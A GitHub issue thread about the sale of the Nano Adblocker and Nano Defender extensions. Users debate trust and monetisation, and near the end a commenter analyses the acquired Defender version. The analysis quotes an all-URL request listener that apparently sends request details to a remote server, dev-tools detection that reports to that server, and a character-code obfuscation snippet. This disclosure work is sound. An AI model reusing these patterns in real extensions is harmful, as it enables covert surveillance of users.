[Announcement] Recent and upcoming changes to the Nano projects
jspenguin2017 opened this issue ยท 92 comments
Important updates and disclaimers: The WebStore listings are no longer under my control. I am not responsible for the actions of the new developer(s). If you feel concerned about the recent changes (please continue reading for more information), please remember that you can uninstall the extensions and/or find alternatives at any time.
As some of you might have noticed, Nano Adblocker is now months behind upstream. It became clear that I simply do not have enough time to properly maintain the Nano projects.
At the beginning, there were no backlogs. As the projects grow, I added a backlog system to better manage open issues. That was unfortunately not enough, so I added another level of backlog -- the triage queue. Then a third level. And a fourth one. Now the fourth level of backlog, the notification queue, has over 138 issues waiting for my attention. No matter how well I organize incoming issues, if I do not have enough time to look into them, I will simply fall further and further behind. With thousands of issues backlogged, it is only a matter of time that the Nano projects collapse.
And here comes the news. New developer(s) are in the process of acquiring Nano Adblocker and Nano Defender. Hopefully, they will be able to put an end to this backlog madness and finally give Nano Adblocker some real development time instead of constantly trying to catch up to upstream. The transition is still taking place, so I would like to ask for your patience. I will have more details about this in the upcoming days or weeks.
I would like to apologize for not being able to post an announcement earlier. I was extremely busy last week, and with all the additional things that I have to take care of to ensure a smooth transition, I fall quite a bit behind schedule. If you have any questions or concerns, please post them below. I am still trying to catch up, so please be patient while I find time to respond to your inputs.
Updates:
The new developer(s) said that they will create their own repositories and change links where appropriate.
The Edge store listings were changed to hidden.
NanoMeow/MDLMirror has been archived.
NanoMeow/UltimateMirror has been archived, and its visibility has been changed to private.
NanoMeow/MirrorEngine has been archived.
The Nano Defender repository has been archived.
Repositories in NanoAdblocker and NanoAdblockerLab organizations except NanoAdblocker/NanoCore have been archived.
The backend server running on legacy.hugoxu.com will no longer accept new reports from the Quick Issue Reporter.
NanoAdblocker/NanoCore and NanoMeow/QuickReports will be archived on 2020-10-15.
Please head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues
Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender, the vague notion of "A team of Turkish developers" would definitely need a lot more clarification when the time is right to do so, before I'd feel safe and confident about this.
Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender
That part was not necessary IMO.
(probably) Most users of Nano Adblocker/Defender care about their online privacy, so they will probably share your concern and desire for more information, as do I.
I meant that I was the only list maintainer of a major list that used Nano Adblocker as my main adblocker in my everyday life.
Before I was contacted by the new developer(s), I was planning on downscaling my projects due to time constraints. I had a totally different announcement drafted, in which I announced that some of the Nano projects will become unmaintained. When I started my projects, I never thought it would become this big, and lately, it has been too much for me. I was honestly hoping that someone would take the maintenance burden away from me. Having to choose between shutting down the projects and having someone else to take care of them, I chose the latter.
All this is still new to me, and I am still learning. I hope that I made the right choice and let's hope for the best.
Frankly it reminds me of the past taking over of uBlock. I don't need to know much about uAssets contributors, their years of contribution speaks all. We know nothing about the new developers.
There was one day where I was a new developer who has no contribution history at all.
And you grew your userbase organically, they are first and foremost aquiring your userbase, hence the scepticism.
Does the team of Turkish developers have any previous experience with adblocking in any shape or form?
Software development skills are transferable, and the skills needed to develop a product tend to be different than the ones needed to use a product. Of course developers need to know how to use the features they are developing, but the experience from developing a completely different extension would be much more important than the experience with adblocking. As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works. However, this has not limit my ability to develop other parts of the extension.
@okiehsch That is a good point, I will see what kind of information I can share.
I am going to bed now. I am not sure what my schedule for next week will look like, so I apologize in advance if I cannot find time to properly reply to your comments until the weekend.
As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works.
I would like to point out my view that Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks, most of the work that benefit Nano occurs in uBO. Surely the acquirers are aware of this?
In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue (which requires maintaining an intermediate server), but for the rest I see it only as mostly uBO when leaving out the code editor and tweaks -- the sparse list of fixed issues confirms that the bulk of the commits benefiting Nano occurs in uBO.
I will see what kind of information I can share.
Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information to those people who wants to acquire your user base (essentially acquiring your user base's trust and a way to monetize uBO volunteers' work) before considering your user base's best interests, i.e. who is going to maintain the extension they use.
Additionally, why refer to the acquirer as "Turkish developers" instead of just naming the entity? The nationality of developers is irrelevant, but the entity and its track record is. I find it odd that you feel like mentioning their nationality which is irrelevant while leaving out the more important information about which entity is involved so that people can research it.
I am just going to ask point blank:
- Which entity is acquiring your user base, control of your repos, and control of Chrome/Microsoft store publications?
- Are the acquirers related in any way to eyeo or BetaFish?
As far I am concerned at this point from what is being disclosed, what I see is a yet to be disclosed entity is planning to monetize the work and time of all uBO contributors indirectly by acquiring and monetizing Nano.
As a Firefox port maintainer, I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part. I am neutral to the decision, but if the upstream developer is changed, I need to think about should I detached from upstream and rename the project, maintain for the new developers, or just abandon the Firefox port. It is unlikely I will still continue maintain for new developers without knowing their stance.
My initial motivation for maintaining this project is I find the usefulness of this project and do not want it dead on Firefox (previously original author and some other maintainers do maintain on Firefox for a while). I try my best to turn myself from normal user to maintainer. I am still too far to be qualified as developer. But in case I still need this project and the new developers do not take over the port (or I don't like their stance, just in case...), I will try my best to develop on my own (or maintain for them if I agree with new developers).
However, as the uBO have its syntax highlighter and the new Firefox mobile do not support addons other than Recommended Extension, I am even confuse whether Nano Adblocker is still needed on Firefox if report issue is missing (or suspicious that everyone is concerning). At best, the new developers are good (maybe better than me) and they will maintain ports on Firefox greater than previous. At worst, either I will slowly develop on my own, or just use uBO and abandoned it.
Update: I refuse to port for this project anymore.
I think that among the other original features of Nano Adblocker, {{nanoHref}} was the one I liked the most. It was much like {{origin}} for autoCommentFilterTemplate, but displayed the whole URL and not just the domain. This was very convenient when working on the Nano Placeholder Buster list in particular, and I'll see if I have some spare time to submit a request in the uBO issue tracker to add such a feature there as well.
Apart from that and Nano Filters / NanoMeow, I think Nano had a few additional included lists (5 Nano-branded lists + Adblock Warning Removal List), and a few additional scriplets that currently aren't being used for much.
Nano's original advantages in 2018 that made me jump from uBO to Nano back then, like a then-revolutionary linter, and easier integration with Nano Defender, have pretty much been caught up to in 2020 by uBO.
Will the project stay open source?
They can't change the license, and they have to assign GPLv3 license to whatever code they add to the project.
I will be responding to comments in the order they are received. I am quite short on time, so please be patient.
There are a couple other things that I would like to address regarding your input, but I do not have time to write that tonight. So let's just get the burning questions out of the way.
The new developer(s) claimed that they are a pair of independent developers, they said that they are freelancers who are just starting out. Regarding affiliation with Eyeo and BetaFish, I asked them this morning, and they said no.
Update: To clarify, I still control the repos, the Edge store listings, the bot (NanoMeow) account, and the legacy.hugoxu.com domain. I will post an update if any of these change.
Regarding updates to the opening post: I will add disclaimers no matter who acquired my projects. This is not an indication that I no longer care about my projects and their users. Quite the opposite: The updates and disclaimers disclose what I can and cannot control, which gives the users a chance to make an informed decision.
Unfortunately, the projects do not have a good notification system, I linked this announcement in all relevant repos for better visibility, this is the best I can do right now. Hopefully most users would have a chance to see this thread and make a decision before the first update from the new developer(s) comes out.
I will address your comments when I have more time later this week or this weekend.
The developers are apparently named semagul aymak and nizametdin altuncu.
Nano Adblocker is controlled by the former and Defender by the latter. I can't find any information about them.
Why they didn't simply fork the projects? This suggests they wanted not the code base but Nano brand and its user base. What I concern is something like this: https://twitter.com/gorhill/status/1293233244826218498
I can't find any information about them.
So this is what is actually happening, I consider all else to be fluff:
"Two developers"[1] with no track record of ever contributing to the current project, or any related projects at least showing any sort of interest in content blocking or privacy or even loosely related topics, and with no visible internet presence to this day, paid an undisclosed amount in exchange of the user base and control of the GitHub repositories.
As of now, the user base has already been transferred (as per Chrome store listings), and in all likelihood a majority of those users will have no idea their installed extensions is no longer maintained by the person they originally trusted, at least implicitly, when they installed those extensions. Links to the privacy policy have been removed from the Chrome store listings (here, and here).
It goes without saying that the goal of these "two developers" is to monetize the two extensions. Those "two developers" will likely continue to import all the work from upstream, i.e. uBO, which is the result of long time volunteers investing their own free time and efforts days after days spanning years, which also contributed to make Nano AdBlocker to become what it is.
[1] Using quotes because nobody knows that there are really two actual developers given that nothing can be verified so far.
Looks like I will be removing everything related to Nano Core/Defender from my uBlock Origin preferences. I've seen how this goes with content-blocking extensions. They have usually turned around and monetized in some fashion. We don't need any more rubbish like that in the ecosystem.
@jspenguin2017, I honestly think it would have been better off that you shut down the projects and redirect users back to uBlock Origin instead of "sell" them down the river. As @gorhill has mentioned, it is entirely likely that existing extension users have no idea that ownership has changed hands. This is a significant privacy and security issue as extensions can auto-update.
In all honesty, I'm for uBlock Origin marking Nano lists as bad unless these situations can be addressed. Transferring the project over to unknown and unproven maintainers makes no sense.
Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks
In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue
You are not wrong if you compare Nano with uBO today, but this was not always like this. Nano was the first adblocker to ever get a syntax highlighter. So I would say that the syntax highlighter is the best original feature since the ability to quickly and easily report issues is present in AdGuard, Adblock Plus, and probably other adblockers before Nano.
Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information
I totally agree, it definitely does not look good for me. This is the first time someone acquired my projects, and honestly I am not too sure what I am supposed to do. If there is a next time, I will certainly be more prepared.
Ultimately, I have no control over what the new developer(s) do. So I updated all of my posts in this thread to be clearer and more neutral. This should hopefully help users to make properly informed decisions unaffected by their trust in me, implicit or otherwise.
I dont understand why people care about nano so much, I mean literally its ublock origin fork with some features
@enescglyn Because so many people use Nano.
I started noticing youtube ads. Now I am here. I guess this is it for me. It was good 2 years. Going back to uBlock Origin. Thanks to the nano developer I never noticed ads and ad detector.
The new developer(s) have yet to publish an update at the time of your post. Your issue is most likely unrelated to the changes announced here.
I don't think he was saying the changes were related. I think he just came here looking for a fix or reasoning, and then discovered this unfortunate issue and decided to give up on Nano. I too had a similar experience. I came to GitHub looking for an explanation on the lack of recent updates, and came across this, and I think this is probably it for me and Nano Adblocker too.
The lack of any announcements or transparency as well as the lack of information regarding the situation, plus the fact that the new maintainers have zero history of ever working on anything, let alone this project, just doesn't really make me want to keep using this.
Sure, now there is information available here, but unless you come looking for it, you'll probably never find out. Honestly, if there was a noticeable announcement in the plugin, like a new tab popping up saying "Hey, we're transferring ownership!" I would've been a lot happier. I also would've been a lot happier if the new maintainers had shown some prior interest in the project before acquiring it. That looks to me like they're just looking for some easy targets to acquire instead of actually caring about the project.
I plan to still watch out for any new developments in this issue, but I think it is most likely that many users who are informed of this will ditch Nano Adblock.
@jspenguin2017 I'm sorry to hear that you have come to the point where you no longer have enough time in your life to maintain a popular open source project.
I recall a similar situation a couple of years ago where you were extremely critical of me for not having time to maintain my uBlock Origin fork, with no understanding of what I was going through in my life at the time. Your manner was very superior, critical and unnecessarily disparaging of my work and dedication up until that point when life had got out of my control.
I hope your followers show you more grace, understanding, and consideration than you did to me. Especially in light of what seems to be a very dubious and opaque decision to transfer ownership to complete unknowns rather than bring on more collaborators or even just retire the project.
All the best for the future.
This is a really disappointing event.Perhaps many will not be aware that ownership has been transferred.
Decisions that are significantly less transparent are only disappointing.
From now on, I will use ublock.Thank you for your work.
why refer to the acquirer as "Turkish developers"
The new developer(s) claimed that they are in Turkey. I initially include this information so users can be aware of potential time zone differences and language barriers. I was able to communicate with the new developer(s) in English without too many issues, but I believe English is not their native language.
The new developer(s) should contact you directly if they are interested in the Firefox version.
Links to the privacy policy have been removed
Privacy policy links are bound to developer accounts instead of each listing. It was not really "removed", more like "not added". If I recall correctly, it is not possible to publish updates without adding a privacy policy first.
before considering your user base's best interests
I honestly think it would have been better off that you shut down the projects
I have been thinking about this even before the new developer(s) contacted me. Is it in the users' best interests to abandon the project? When I announced that I will no longer maintain the Firefox version myself, I remembered that a lot of people were not happy about it. And that was when the project is over 50 times smaller. Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.
Or people are afraid of FUD, e.g. in Poland, I don't think anyone has talked about selling Nano more globally than this: https://github.com/MajkiIT/polish-ads-filter/discussions/17251
and on one portal I know 2 boys avid fans and 1 girl avid fan, which they advertise Nano very much where can.
Your manner was very superior, critical and unnecessarily disparaging of my work
I simply wanted to let you know about a setup that saved time for me. I am sorry that you took it this way.
The new developer(s) should contact you directly if they are interested in the Firefox version.
Might you forward this issue link to them such that they can show up here? One of reasons that many people feel insecure is that they never exist here and we only know them via you. No one can actually interact with them except you, even I have no way to reach them for question. Who knows how long I will have to wait if I cannot contact them?
Situation can be much better if they show up and introduce themselves as new developers to their users, at least knowing two developers are really actually exist without using quotes. I don't see any reason to hide themselves from here, or more accurate, their users.
Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.
Do you seriously believe this? Most users of Nano do not check github and have no way of knowing that this transfer of ownership has taken place.
Is it in the users' best interests to abandon the project?
You really think that your users prefer you selling them to an unknown third party to you stop maintaining the extension?
If you had just given control away I could kind of see the point but logic dictates that the buyers will try to monetize the user base otherwise they could have simply forked.
Why do people install ad blockers? As the now former developer of a security and privacy extension, it should be expected of you that administrative issues are resolved with these reasons kept in mind.
Since changing store ownership is a known weakness that has been exploited in the past - through both guile and the sale of the product - I had expected more thought be put into this action. In my mind it's even more relevant, because the main browser this blocker was developed for isn't capable of stopping extension updates, leaving the average user both without knowledge of the change and unable to prevent from potentially being taken advantage of.
Reading this thread, one thing has become very clear: you don't really know who you sold to. These two people may be fine examples of humanity and their desire to continue development may be entirely honest and altruistic. It's equally possible that they're fronts for some shady advertising companies who went into this arrangement with plans to subvert the existing user base of the extension or introduce other harmful changes. There's no proof or even indication either way, but the uncertainty is a problem.
In a case like this, at the very least I would have expected the developer to push an update to all users which informs them of the impending change of ownership. I'm not sure where else this notification has been posted to, but the average user can't be expected to follow GitHub issues for each and every of their software.
While there are no hard feelings from me for your actions - I sympathize with the lack of time, it's all too understandable that caring for a free product isn't easy nor rewarding most of the time - there's no doubt in my mind that your reputation has taken a hit from how you've handled this. Also, if you ever start another security/privacy project in the future, the privacy-conscious crowd will no doubt come back here and find a good reason not to use it.
That criticism aside, I wish you all the best in your future and leave here with a thanks for your efforts back when Nano was shiny and new. The (once) unique features of Nano aren't the draw they once were, so moving back to uBlock Origin will be easy.
You really think that your users prefer you selling them to an unknown third party to you stop maintaining the extension?
If there was a clear candidate to be the new maintainer, I would have simply transferred the control over to them. The new developer(s) demonstrated their resourcefulness and dedication with their acquisition, and they are the best candidates that I currently know to be the new maintainers.
the buyers will try to monetize the user base
If the new developer(s) are able to provide meaningful contributions to the projects, and their monetization efforts are reasonable, I do not see what is wrong with that. If they do not provide meaningful contributions, or their monetization efforts are too aggressive, users will leave and the new developer(s) would have lost their time and money.
demonstrated their resourcefulness and dedication with their acquisition
Meaning they were willing to pay for it?
Note that I don't criticize you for selling, you have put a lot of time and work into this project and it's totally understandable that given the opportunity you take a financial reward.
I just think you should have made more of an effort to inform your users before you made that decision like ElDani82 mentions.
If the new developer(s) are able to provide meaningful contributions to the projects, and their monetization efforts are reasonable, I do not see what is wrong with that.
I agree but I doubt that there is a reasonable way to monetize privacy and security conscious users that would also be worth their investment.
Time will tell.
As the now former developer of a security and privacy extension, it should be expected of you that administrative issues are resolved with these reasons kept in mind.
Nano is not a "security and privacy" extension. It is an adblocker. It is called Nano Adblocker after all. It happens to also block some trackers but that is not the focus, this is reflected in the filters policy of Nano Filters: tracking and privacy related issues are out of scope.
Having gone through a few mergers, I will add my feedback only from that perspective.
Typically, there is no announcement or confirmation of a sale until the sale is done. They may set a future date for when operations, assets, personnel, etc. is officially handed over but from the legal standpoint it is often done and the new company is officially in charge.
Once the sale is done. A joint press release is done by both parties. This will produce the following
- General Press Release announcing the sale and introducing the new owners
- FAQ document that answers the top questions customers are likely to have about the sale
- Internal documents to employees with more details and guidance on how to answer questions to customers.
The Press Release says what happened, who we are, and will try to reflect the benefit this will have on the product and customers. This is a joint statement approved by both parties so it's typically the same and released on both websites. Sometimes, one party may add a few more statements with their own take and is quite often approved by both parties to ensure messaging is aligned with each other. See the GitHub acquisition announcement by Microsoft as a great example.
The FAQ is compiled with what both companies feel will be the most common questions that their customers will have. Customers and employees are scared at this point. The FAQ is meant to address those fears as much as possible with a positive spin on how this will advance the product and improve customer lives. A lot of times, the new company doesn't want to address roadmap and overpromise so they will keep it high level.
The above documents are usually highly coordinated with legal and marketing teams writing it. Unfortunately, that is more difficult for a lone developer because they don't know what to do and may not have time either. English being a secondary language for a developer can add to the difficulty. Had this been a larger company acquisition by someone like RedGate or GitHub, they would have handled this for you. I know RedGate has done this many a time with small useful tools.
The only thing that can be done now is to get the developers to do the above and address their new customers. That is the single largest issue right now because we have not heard anything from them and so everything is speculation. The 2nd issue is the perceived value of what developers will bring to this project and they need to address that. The 3rd issue is how they expect to monetize it since the purchase implies they want to make their money back.
it's totally understandable that given the opportunity you take a financial reward
I tried to stay away from the money topic because people tend to be sensitive to it. But I want to point out that I see the money as more of a safety mechanism. I will keep some of it to cover taxes, server costs, developer license costs, and other things. But I will consider donating some or even most of it back to the new developer(s) depending on what they do.
Thank you for your great insights. I honestly did not think it would be this complex. I thought a quick announcement would be enough since that is what I used to do to announce changes.
I already asked [1] the new developer(s) to join the discussion and to introduce themselves, but I am not sure what their calendars look like.
[1] #362 (comment)
As a developer who makes some paid software, it's understandable to sell what you can get for a profit when you can get a profit.
However, the concerns for us users are as follows
- The buyer is not famous (it's suspicious that we cannot get much information when you research them.)
- Their intention to purchase Nano Adblocker (it is not generating any profit at the moment)
- The software can be used to read and "steal" data
As for 3, it's a critical issue. Something similar has happened in the past.
Since this fact is quickly buried as the conversation goes on, I will reiterate that after you leave out @jspenguin2017's development efforts, the bulk of what they will be monetizing is thousands of hours of works invested by volunteers over many years who are not a party to all this: uBO, uAssets (add to this all Crowdin contributors).
the bulk of what they will be monetizing is thousands of hours of works invested by volunteers
That is not wrong. But I do not see a problem with that if the new developer(s) make meaningful contributions themselves. The goal of the GPL license that you chose when you started uBO is so that people can share and build on each other's work, is it not?
I do not see a problem with that if the new developer(s) make meaningful contributions themselves
You have an actual, credible examples of monetized content blockers based on and contributing back to a non-monetized upstream repo? I don't believe you believe your own statement about (still unknown) developers -- with no track record of contributing to anything -- contributing back, it's just a necessary rationalization once you accepted the deal. I was too offered deals, and a specific one suggested how it could be "framed" to rationalize the deal to the outside world. It's what they do to convince you to go through the deal.
AdBlocker Ultimate?
https://github.com/adblockultimate/AdBlocker-Ultimate-for-Firefox
https://github.com/adblockultimate/AdBlocker-Ultimate-for-Chrome
That have paid app for Windows: https://adblockultimate.net/windows
And browser with paitment for Android: https://play.google.com/store/apps/details?id=s.sdownload.adblockerultimatebrowser
Only that it may be a mistake that AdGuard once had an open source code for extension/app - now both is hidden from world so possible see version after unzip crx / xpi and with reverse engineering only app for Windows/macOS/iOS.
AdBlocker Ultimate?
Owner of AdBlocker Ultimate app is contributing code to its own Adblock Ultimate extension -- how is this even a valid example when both ends are the same owner? Adblock Ultimate is the worst example you could find because it proves my point, it's based on AdGuard's code (see https://twitter.com/gorhill/status/1165747661691064322) and it's just a pretend repo.
Owner of AdBlocker Ultimate app is contributing code to its own Adblock Ultimate extension
"Contributing" as in "syncing with the latest AdGuard code".
Only that it may be a mistake that AdGuard once had an open source code for extension/app - now both is hidden from world
Ehm? Extensions and iOS version were never hidden and are on GH as well as a lot of other software we make.
contributing back to a non-monetized upstream
By contributions, I meant contributions in the broader sense. From my past experience, I know that you are very strict about what code goes into uBO. So I agree that it would not be reasonable to expect the new developer(s) to "contribute back" with you being the gatekeeper. To be clear, I am not saying whether being strict is good or bad, I am simply stating what I have observed over the years. Anyway, I consider developing new features, creating new filter lists, triaging and resolving issues and bugs, among other things to be contributions.
Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.
@jspenguin2017 Honestly, after reading this and later comments about your receiving financial compensation for the project and the implied intent for the new party to monetize, I have lost pretty much all respect for you and the project. While @okiehsch may not raise much criticism for wanting to sell out, I will.
As the (then) owner and maintainer of an extension with such extensive permissions, you have an obligation to protect the privacy and security of users. Why should existing users be subject to monetization practices that compromise their privacy and security because you wanted to sell the project and make money off of it? You lose all integrity by doing this. If anything happens to end-users because of your sale of the project, that can almost certainly be traced back to you as putting users in harm's way, to begin with. I don't want to be so dramatic as to say that you have "blood on your hands" for this, but I see this as an irreparable violation of trust.
Selling the efforts of volunteers in the upstream project (uBlock Origin) is also ridiculous. This kind of practice is toxic to the open-source ecosystem. It discourages users to contribute because their good-faith contributions are then monetized. Downstream monetized projects rarely contribute in an effective way to make up for this, at least in this context.
I absolute agree with @Techman, even if you make your own contributions, I simply cannot see how it's okay to sell off something that isn't 100% your own work. Maybe if some people helped you bug test your own application or they contributed a few small fixes, but in this case, Nano is a relatively minor modification to uBlock. uBlock is what's been supplying Nano with the majority of its code for years now.
I found it especially funny though when you stated that "Nano is not a 'security and privacy' extension. It is an adblocker." If you haven't noticed, Nano is based on uBlock, but uBlock clearly states that it is "not an ad blocker", and that "uBlock Origin's main goal is to help users neutralize such privacy-invading apparatus", taken from the uBlock Origin Readme. So I guess Nano is indeed a "security and privacy" extension.
So I guess Nano is indeed a "security and privacy" extension
It is baffling that some people try to tell me what my projects are.
Either way, I think I have provided enough information about the what and the why of recent changes. I have other things to work on so I might not keep monitoring this thread, but please feel free to continue the discussion below.
I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part.
After viewing many post about monetized, I decide not to port for "new developers" anymore because of the following reasons:
- There is no point that the new developers never announce a single update when acquisition happen for a week, given that link to here is provided, those developers are neither fool nor newbie, and they can be communicated with English as mentioned from former developer.
- Considering how inactive of ublock-LLC is given that acquirer getadblock also demonstrated their "resourcefulness and dedication with their acquisition" (in terms of money), but at least their acquirer do announce their acquisition and show up on GitHub. TBH, I really don't want to compare an addon that I port for two years with a shady thing...
- Other than Chrome Store ownership changes, new developers information are nowhere to be found. If they are meant to take over, they should update the information, at least not link to old developer site anymore.
- Combining above points, it is questionable that whether "new developers" exist.
- Even they show up in last moment, if they plan to monetized the project, contributing or not, I become their free labor if I still port for them. I will not accept even they hire me with payment. This rule also applies to volunteers that contribute to the project.
I am sorry for not keeping myself neutral anymore. I am not 100% against monetizing project, but it is too dangerous for a product converted from non-monetizing without proper notice (users not on GitHub never know change of ownership), especially the functionality of quick issue reporter. I cannot find whether the control of quick issue reporter and Nano Filters are also passed, but it will be horrible if the issue you report is read by unexpected person, or the filter you are using suddenly whitelist with "acceptable ads". You may also argue that non-monetizing project can still perform this evil thing, but it is much unlikely when compare to a monetizing scenario which profits override users. It is more suspicious when "new developers" keep themselves stealth to monetize a project with voluntarily phone home capability [1]. Who knows what are their purposes?
I think things are already out of former developer's control. Things are irreversible anyway, neither he can force the new developers reveal nor undo the acquisition. Whether his decision right or not, his past efforts and contribution should not be annihilated. Thanks for making that great extension from the past and guide me how to manage an addon project. I might not join GitHub and become a maintainer if this project never exist.
[1] It is voluntarily as no information will be sent until user click send button.
Update: Their Chrome Store privacy policy is here, but still no words from them. I overlook it before posting this comment. This means they are active but purposefully keep themselves stealth.
Looks like they registered a new domain and smashed together a generic privacy policy with a template.
The new Privacy Policy: https://sites.google.com/view/nano-dev
But old - read all #362 (comment)
still based on stock template and no correct edited.
https://dev-nano.com (same as from "e-mail") have counter to 17 november 2020:
 |
|---|
So this project will continue after other devs take it? I don't care about privacy, I only want websites that don't harm my adblocker. I use two browsers one for work one for entertainment so I don't have a problem with privacy. I hope they won't drop this project.
@Salin1810 Personally, I think I will most likely switch to uBlock Origin. Without knowing what these new devs are doing, they may mess with the filters and let companies pay them to allow their ads or something. Even if you don't care about the possible privacy issues, I don't see how else these new developers plan to make their money back. Unless they're just genuinely really excited about working on this project, but it sure doesn't seem that way at the moment.
But ultimately, that's up to you I guess. You would lose Nano Defender, if you're also using that. I'm not sure how much of a difference it makes, but I'm assuming it does help, so not having it anymore could be disappointing and frustrating.
And @jspenguin2017, I apologize for being rude to you. I will not hide that I am extremely frustrated with your decision, but who knows, given that I also have no prior experience with this kind of situation, I could just as easily make a mistake as well. I guess I just hope that everyone here can learn something from this and move on with their lives.
I don't care about privacy
A reminder that when the browser warns you that an extension can "read and change all your data on the websites that you visit", it's not just for privacy concerns, it's especially for security concerns (example). It all comes down to trust, and the most basic rule of browser extensions is simply to never install extensions you do not explicitly trust. Trust is to be earned, not given. Dismissing security concerns with "I don't care about privacy" is just silly.
have counter to 17 november 2020:
I don't think so - it resets every time you reload the page :D
https://sites.google.com/view/nano-dev#h.1cqsve3a47lk
Types of Data collected:
Social Media
Complete details on each type of Personal Data collected are provided in the dedicated sections of this privacy policy or by specific explanation texts displayed prior to the Data collection.
Personal Data may be freely provided by the User, or, in case of Usage Data, collected automatically when using this Application
Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.
Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies โ or of other tracking tools โ by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.
Users are responsible for any third-party Personal Data obtained, published or shared through this Application and confirm that they have the third party's consent to provide the Data to the Owner.
Is that part of the template ?
@gwarser
Indeed, it appears they didn't even bother to set the countdown timer properly... They even left the default comments in. If the inputted date is before the current time, it defaults to a relative date instead of absolute. If this is the kind of care that they're going to put into working on Nano, I'd be concerned.
$('.cd100').countdown100({
// Set Endtime here
// Endtime must be > current time
endtimeYear: 0,
endtimeMonth: 0,
endtimeDate: 35,
endtimeHours: 18,
endtimeMinutes: 0,
endtimeSeconds: 0,
timeZone: ""
// ex: timeZone: "America/New_York", can be empty
// go to " http://momentjs.com/timezone/ " to get timezone
});Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.
Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies โ or of other tracking tools โ by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.
It was really worth selling users down the river, huh @jspenguin2017?
I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.
Is that part of the template ?
@uBlock-user They used something like https://www.termsfeed.com, the part you quote is used in generic templates.
Look at https://mindsetdirect.com/privacy-policy/ for example.
I am concerned.
I have been using Nano for years. I even typed passwords with the extension on due to my complete trust in @jspenguin2017 and @gorhill .
Now I just clean installed windows , noticed edge beta listings are gone and finally finding this .
I am worried about my passwords. I have very little understanding of coding, but reading this discussion I find that : they can't change the license and they must add license to whatever code they add, that @jspenguin2017 was in charge of listings, repositories ecc 8 days ago and that the new devs still have to publish an update for the extension.
So, should I change all my passwords or not?
hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.
https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=en
Welll, I already installed uBlock Origin. But this thread is pooping up on my mail.
@novaz9 No worry since the packages have not been updated yet. Once they are updated, anybody will be able to look at their content to find out if there is anything wrong in them.
hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.
https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=enWelll, I already installed uBlock Origin. But this thread is pooping up on my mail.
Actually "ana sayfa" means "home page" in English
Or another random girl - Ana maybe "=" Anna.
Finally they are here: https://github.com/nenodevs/uBlockProtector
And their Chrome Store also update to 15.0.0.206
However, their update on Chrome Store does not match the one in their repository (not sure if forgot push or else). You can compare their GitHub and the below image.
Their Chrome Store version add a script call connect.js while do not reveal in their GitHub. Not sure if this violate GPLv3.
The new script they add seems minified (or maybe even obfuscated but I cannot sure now)(Thanks for uBlock-user answer). I am not a Chrome user and don't know whether there are so-call release note to explain why adding this. (Although I guess mostly not as they don't even have that on GitHub).
I don't think it's malicious, looks like an older version of the socket.io library.
You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.
You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.
Or this, by the same guy: https://robwu.nl/crxviewer/
So here is what I am seeing in the new Nano Defender 15.0.0.206:
Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.
Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:
At launch, the extension fetch something from https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listen to https://def.dev-nano.com/ for messages to populate listOfObject.
The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to https://def.dev-nano.com/ under the name handleObject.
Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:
chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
urls: ["<all_urls>"]
}, ['requestHeaders', 'blocking', 'extraHeaders']);
So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.
There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:
var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
